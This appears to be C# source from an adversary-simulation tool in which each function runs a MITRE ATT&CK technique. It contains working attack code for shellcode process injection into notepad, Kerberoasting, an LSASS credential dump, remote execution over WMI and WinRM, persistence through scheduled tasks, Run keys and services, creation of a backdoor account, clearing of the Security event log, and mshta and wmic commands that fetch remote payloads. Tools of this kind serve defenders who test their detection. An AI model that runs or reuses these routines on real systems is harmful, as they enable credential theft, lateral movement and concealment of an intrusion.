public static void CreateScheduledTaskCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1053.005");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string taskName = "BadScheduledTask";
string binpath = @"C:\Windows\Temp\xyz12345.exe";
ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /CREATE /SC DAILY /TN {0} /TR ""{1}"" /ST 13:00", taskName, binpath), logger);
if (cleanup)
{
ExecutionHelper.StartProcess("", String.Format(@"SCHTASKS /DELETE /F /TN {0}", taskName, binpath), logger);
Thread.Sleep(3000);
}
else
{
logger.TimestampInfo(@"The created Scheduled Task " + taskName + " was not deleted as part of the simulation");
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void DomaiGroupDiscoveryLdap(PlaybookTask playbook_task, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1069.002");
logger.TimestampInfo("Using LDAP to execute technique");
try
{
if (playbook_task.groups.Length > 0)
{
foreach (string group in playbook_task.groups)
{
logger.TimestampInfo(String.Format("Querying LDAP for members of '{0}'", group));
DiscoveryHelper.LdapQueryForObjects(logger, 2, "", group);
}
logger.SimulationFinished();
}
else
{
logger.TimestampInfo("Querying LDAP for all groups");
DiscoveryHelper.LdapQueryForObjects(logger, 2);
logger.SimulationFinished();
}
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void CreateLocalAccountCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1136.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string username = "******";
string pwd = "Passw0rd123El7";
ExecutionHelper.StartProcess("", String.Format("net user {0} {1} /add", username, pwd), logger);
Thread.Sleep(2000);
if (cleanup)
{
ExecutionHelper.StartProcess("", String.Format("net user {0} /delete", username), logger);
}
else
{
logger.TimestampInfo(String.Format("The created local user {0} was not deleted as part of the simulation", username));
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static List <Computer> GetHostTargets(int servertype, int nhosts, Lib.Logger logger)
{
List <Computer> targethosts = new List <Computer>();
/*
* switch (servertype)
* {
* case 1:
* targethosts = GetDomainNeighborTargets(nhosts);
* break;
*
* case 2:
* targethosts = GetDomainRandomTargets(nhosts);
* break;
*
* case 3:
* targethosts = GetServerRangeTargets(nhosts);
* break;
*
* case 4:
* targethosts = GetNetworkNeighborTargets(nhosts);
* break;
*
* default:
* return targethosts;
* }
*/
targethosts = GetDomainNeighborTargets(nhosts, logger);
return(targethosts);
}
public static void CreateRegistryRunKeyCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1547.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string regKey = "BadApp";
string binpath = @"C:\Windows\Temp\xyz12345.exe";
ExecutionHelper.StartProcess("", String.Format(@"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /t REG_SZ /F /D {1}", regKey, binpath), logger);
if (cleanup)
{
Thread.Sleep(3000);
ExecutionHelper.StartProcess("", String.Format(@"REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V {0} /F", regKey), logger);
}
else
{
logger.TimestampInfo(@"The created RegKey : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" + regKey + " was not deleted as part of the simulation");
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void ShareEnum(Computer computer, Lib.Logger logger)
{
var bufPtr = IntPtr.Zero;
var EntriesRead = 0;
var TotalRead = 0;
var ResumeHandle = 0;
const uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
//https://www.pinvoke.net/default.aspx/netapi32/netshareenum.html
var res = WinAPI.NetShareEnum(computer.Fqdn, 1, ref bufPtr, MAX_PREFERRED_LENGTH, ref EntriesRead, ref TotalRead, ref ResumeHandle);
var errorCode = Marshal.GetLastWin32Error();
var Offset = bufPtr.ToInt64();
// 0 = syccess
if (res == 0)
{
DateTime dtime = DateTime.Now;
//Console.WriteLine("{0}[{1}] Successfully enumerated shares on {2} as {3} ", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, WindowsIdentity.GetCurrent().Name);
logger.TimestampInfo(String.Format("Successfully enumerated shares on {0} as {1} ", computer.Fqdn, WindowsIdentity.GetCurrent().Name));
}
else
{
DateTime dtime = DateTime.Now;
//Console.WriteLine("{0}[{1}] Failed to enumerate shares on {2} as {3}. Error Code:{4}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, WindowsIdentity.GetCurrent().Name, errorCode);
logger.TimestampInfo(String.Format("Successfully enumerated shares on {0} as {1} ", computer.Fqdn, WindowsIdentity.GetCurrent().Name));
}
}
public static void PrivilegeEnumeration(int nhost, int sleep, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T0XXX");
logger.TimestampInfo("Using the System.Management .NET API to execute this technique");
List <Task> tasklist = new List <Task>();
var rand = new Random();
int computertype = rand.Next(1, 6);
List <Computer> targetcomputers = Lib.Targets.GetHostTargets(computertype, nhost, logger);
Console.WriteLine("[*] Starting Find local administrator from {0} as {1}", Environment.MachineName, WindowsIdentity.GetCurrent().Name);
if (sleep > 0)
{
Console.WriteLine("[*] Sleeping {0} seconds between enumeration", sleep);
}
foreach (Computer computer in targetcomputers)
{
if (!computer.Fqdn.ToUpper().Contains(Environment.MachineName.ToUpper()))
{
tasklist.Add(Task.Factory.StartNew(() =>
{
Simulations.DiscoveryHelper.FindLocalAdminAccess(computer);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}));
}
}
Task.WaitAll(tasklist.ToArray());
}
public static void WmiCodeExecution(Computer computer, string command, Lib.Logger logger)
{
try
{
ConnectionOptions connectoptions = new ConnectionOptions();
var processToRun = new[] { command };
var wmiScope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", computer.Fqdn), connectoptions);
var wmiProcess = new ManagementClass(wmiScope, new ManagementPath("Win32_Process"), new ObjectGetOptions());
wmiProcess.InvokeMethod("Create", processToRun);
//DateTime dtime = DateTime.Now;
logger.TimestampInfo(String.Format("Started a process using WMI Win32_Create on {0}", computer.ComputerName));
//Console.WriteLine("{0}[{1}] Successfully created a process using WMI on {2}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
}
catch (Exception ex)
{
//DateTime dtime = DateTime.Now;
if (ex.Message.Contains("ACCESSDENIED"))
{
logger.TimestampInfo(String.Format("Failed to start a process using WMI Win32_Create on {0}. (Access Denied)", computer.ComputerName));
//Console.WriteLine("{0}[{1}] Failed to execute execute a process using WMI on {2}. (Access Denied)", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
}
else
{
logger.TimestampInfo(String.Format("Failed to start a process using WMI Win32_Create on {0}. {1}", computer.ComputerName, ex.GetType()));
//Console.WriteLine("{0}[{1}] Failed to execute a process using WMI on {2}. {3}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, ex.GetType());
}
}
}
public static void CreateWindowsServiceCmd(string log, bool cleanup)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1543.003");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
string serviceName = "UpdaterService";
string servicePath = @"C:\Windows\Temp\superlegit.exe";
ExecutionHelper.StartProcess("", String.Format(@"sc create {0} binpath= {1} type= own start= auto", serviceName, servicePath), logger);
Thread.Sleep(3000);
if (cleanup)
{
ExecutionHelper.StartProcess("", String.Format(@"sc delete {0}", serviceName), logger);
}
else
{
logger.TimestampInfo(String.Format("The created Service: {0} ImagePath: {1} was not deleted as part of the simulation", serviceName, servicePath));
}
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Kerberoasting(string log, int sleep)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1558.003");
if (sleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between each service ticket request", sleep));
}
try
{
//NetworkCredential cred = null;
List <String> spns;
spns = Ldap.GetSPNs();
foreach (String spn in spns)
{
Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Kerberoasting(string log, int sleep = 0)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1208");
//logger.TimestampInfo(String.Format("Starting T1208 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
if (sleep > 0)
{
Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
}
try
{
//NetworkCredential cred = null;
List <String> spns;
spns = Ldap.GetSPNs();
foreach (String spn in spns)
{
Lib.SharpRoast.GetDomainSPNTicket(spn.Split('#')[0], spn.Split('#')[1], "", "", logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void StartProcess_old(string binary, string cmdline, Lib.Logger logger, bool cleanup = false)
{
if (!cleanup)
{
logger.TimestampInfo("Executing Command: " + cmdline);
}
else
{
logger.TimestampInfo("Executing Cleanup Command: " + cmdline);
}
const uint NORMAL_PRIORITY_CLASS = 0x0020;
bool retValue;
Structs.PROCESS_INFORMATION pInfo = new Structs.PROCESS_INFORMATION();
Structs.STARTUPINFO sInfo = new Structs.STARTUPINFO();
Structs.SECURITY_ATTRIBUTES pSec = new Structs.SECURITY_ATTRIBUTES();
Structs.SECURITY_ATTRIBUTES tSec = new Structs.SECURITY_ATTRIBUTES();
pSec.nLength = Marshal.SizeOf(pSec);
tSec.nLength = Marshal.SizeOf(tSec);
retValue = WinAPI.CreateProcess(null, cmdline, ref pSec, ref tSec, false, NORMAL_PRIORITY_CLASS, IntPtr.Zero, null, ref sInfo, out pInfo);
if (retValue && cleanup == false)
{
logger.TimestampInfo(String.Format("Process successfully created. (PID): " + pInfo.dwProcessId));
}
else if (retValue != false && cleanup == false)
{
logger.TimestampInfo("Could not start process!");
}
}
public static void ProcInjection_APC(byte[] shellcode, Process proc, Lib.Logger logger)
{
logger.TimestampInfo(String.Format("Calling OpenProcess on PID:{0}", proc.Id));
IntPtr procHandle = WinAPI.OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, proc.Id);
//IntPtr procHandle = WinAPI.OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, proc.Id);
Int32 size = shellcode.Length;
logger.TimestampInfo(String.Format("Calling VirtualAllocEx on PID:{0}", proc.Id));
IntPtr spaceAddr = WinAPI.VirtualAllocEx(procHandle, new IntPtr(0), (uint)size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
UIntPtr bytesWritten;
IntPtr size2 = new IntPtr(shellcode.Length);
logger.TimestampInfo(String.Format("Calling WriteProcessMemory on PID:{0}", proc.Id));
bool bWrite = WinAPI.WriteProcessMemory(procHandle, spaceAddr, shellcode, (uint)size2, out bytesWritten);
uint oldProtect = 0;
bWrite = WinAPI.VirtualProtectEx(procHandle, spaceAddr, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
//TODO: do we need to do it for all threads ?
foreach (ProcessThread thread in proc.Threads)
{
IntPtr tHandle = WinAPI.OpenThread(Structs.ThreadAccess.THREAD_HIJACK, false, (int)thread.Id);
logger.TimestampInfo(String.Format("Calling QueueUserAPC on ThreadId:{0}", thread.Id));
IntPtr ptr = WinAPI.QueueUserAPC(spaceAddr, tHandle, IntPtr.Zero);
}
}
public static void ProcessInjection(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1055");
//logger.TimestampInfo(String.Format("Starting T1055 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
try
{
Process proc = new Process();
proc.StartInfo.FileName = "C:\\Windows\\system32\\notepad.exe";
proc.StartInfo.UseShellExecute = false;
proc.Start();
logger.TimestampInfo(String.Format("Process {0}.exe with PID:{1} started for the injection", proc.ProcessName, proc.Id));
DefenseEvasionHelper.ProcInjection_CreateRemoteThread(Convert.FromBase64String(Lib.Static.donut_ping), proc, logger);
//DefenseEvasionHelper.ProcInjection_APC(Convert.FromBase64String(Lib.Static.donut_ping), proc, logger);
//DefenseEvasionHelper.ProcInjection_CreateRemoteThread(Lib.Static.msf_meter, not);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static List <Computer> GetDomainRandomTargets(int count, Lib.Logger logger)
{
List <Computer> targets = new List <Computer>();
Console.WriteLine("[*] Obtaining domain random targets ...");
targets = Ldap.GetADComputers(count, logger);
return(targets);
}
public static List <Computer> GetDomainNeighborTargets(int count, Lib.Logger logger)
{
List <Computer> targets = new List <Computer>();
PrincipalContext context = new PrincipalContext(ContextType.Domain);
string dc = context.ConnectedServer;
logger.TimestampInfo("Obtaining domain neighbor targets ...");
targets = Ldap.GetADComputers(count, logger, dc);
//Console.WriteLine("[*] Finished");
return(targets);
}
public static void RegistryRunKey(Lib.Logger logger)
{
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
//RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true);
registryKey1.SetValue("BadApp", @"C:\Windows\Temp\xyz123456.exe");
logger.TimestampInfo(@"Created Regkey: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run - C:\Windows\Temp\xyz123456.exe ");
//registryKey2.SetValue("BadApp", @"C:\Windows\Temp\xyz123456.exe");
//logger.TimestampInfo(@"Created Regkey: HKCU\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce - C:\Windows\Temp\xyz123456.exe ");
registryKey1.DeleteValue("BadApp");
logger.TimestampInfo(@"Deleted : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
//registryKey2.DeleteValue("BadApp");
//logger.TimestampInfo(@"Deleted: HKCU\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce");
}
static public void WindowsCommandShell(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1059.003");
try
{
ExecutionHelper.StartProcessApi("", "cmd.exe /C whoami", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void LsassMemoryDump(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1003.001");
try
{
CredAccessHelper.LsassMemoryDump(logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void SystemNetworkConfigurationDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1016");
try
{
ExecutionHelper.StartProcess("", "ipconfig /all", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void WinRMCodeExecution(Computer computer, string command, Lib.Logger logger)
{
try
{
var connectTo = new Uri(String.Format("http://{0}:5985/wsman", computer.Fqdn));
var connection = new WSManConnectionInfo(connectTo);
var runspace = RunspaceFactory.CreateRunspace(connection);
runspace.Open();
using (var powershell = PowerShell.Create())
{
powershell.Runspace = runspace;
powershell.AddScript(command);
var results = powershell.Invoke();
runspace.Close();
DateTime dtime = DateTime.Now;
logger.TimestampInfo(String.Format("Started a process using WinRM on {0}", computer.ComputerName));
//Console.WriteLine("{0}[{1}] Successfully created a process using WinRM on {2}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
/*
* Console.WriteLine("Return command ");
* foreach (var obj in results.Where(o => o != null))
* {
* Console.WriteLine("\t" + obj);
* }
*/
}
}
catch (Exception ex)
{
DateTime dtime = DateTime.Now;
if (ex.Message.Contains("Access is denied"))
{
logger.TimestampInfo(String.Format("Failed to start a process using WinRM on {0}. (Access Denied)", computer.Fqdn));
//Console.WriteLine("{0}[{1}] Failed to execute execute a process using WMI on {2}. (Access Denied)", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
}
else if (ex.GetType().ToString().Contains("PSRemotingTransportException"))
{
logger.TimestampInfo(String.Format("Failed to start a process using WinRM on {0}. (Port Closed)", computer.Fqdn));
//Console.WriteLine("{0}[{1}] Failed to execute execute a process using WMI on {2}. (Port Closed)", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn);
}
else
{
logger.TimestampInfo(String.Format("Failed to start a process using WinRM on {0}. {1}", computer.Fqdn, ex.GetType()));
//Console.WriteLine("{0}[{1}] Failed to execute a process using WinRM on {2}. {3}", "".PadLeft(4), dtime.ToString("MM/dd/yyyy HH:mm:ss"), computer.Fqdn, ex.GetType());
}
}
}
public static void ClearSecurityEventLogCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1070.001");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void InstallUtil(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.004");
try
{
string file = @"C:\Windows\Temp\XKNqbpzl.exe";
ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=alse /U {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void XlScriptProcessing(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1220");
try
{
string url = "http://webserver/payload.xsl";
ExecutionHelper.StartProcess("", String.Format("wmic os get /FORMAT:\"{0}\"", url), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Rundll32(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.011");
try
{
string file = @"C:\Windows\twain_64.dll";
ExecutionHelper.StartProcess("", String.Format("rundll32 \"{0}\"", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Csmtp(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.003");
try
{
string file = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt";
ExecutionHelper.StartProcess("", String.Format("cmstp /s /ns {0}", file), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void Mshta(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1218.005");
try
{
string url = "http://webserver/payload.hta";
ExecutionHelper.StartProcess("", String.Format("mshta {0}", url), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemServiceDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1007");
try
{
ExecutionHelper.StartProcess("", "net start", logger);
ExecutionHelper.StartProcess("", "tasklist /svc", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void SystemUserDiscovery(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1033");
try
{
ExecutionHelper.StartProcess("", "whoami", logger);
ExecutionHelper.StartProcess("", "query user", logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
static public void ExecuteWmiCmd(string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1047");
logger.TimestampInfo("Using the command line to execute the technique");
try
{
ExecutionHelper.StartProcessNET("wmic.exe", String.Format(@"process call create ""powershell.exe"""), logger);
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
